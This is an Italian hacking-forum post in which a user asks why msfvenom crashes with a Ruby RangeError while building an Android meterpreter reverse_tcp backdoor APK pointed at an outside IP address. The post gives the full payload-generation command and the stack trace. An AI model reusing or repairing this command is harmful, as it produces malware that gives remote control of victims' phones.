Discussione Malware PROBLEMA CON MSFVENOM

masterix

Utente Electrum
22 Febbraio 2015
119
51
1
134
Salve googlando ho visto che ci sono vari metodi per creare un payload ma sfortunatamente nessuno mi funziona :cazz:
ho provato fatrat ma mi dà errore ho provato allora msfpayload e mi dice che il comando non è stato trovato perchè è stato appunto sostituito da msfvenom ma quando vado ad inserire la riga per creare il payload

Codice:
msfvenom -p android/meterpreter/reverse_tcp lhost=52.15.62.13 lport=15621 R > /root/Scrivania/back.apk
mi dà questo

Codice:
/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87:in `not_after=': bignum too big to convert into `long' (RangeError)
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87:in `sign_jar'
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:118:in `generate_jar'
    from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
    from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) in recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:102:in `each_pair'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:102:in `block in recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:98:in `each_pair'
    from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:98:in `recalculate'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
    from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
    from /usr/bin/msfvenom:36:in `init_framework'
    from /usr/bin/msfvenom:45:in `framework'
    from /usr/bin/msfvenom:327:in `<main>'


qualcuno saprebbe aiutarmi?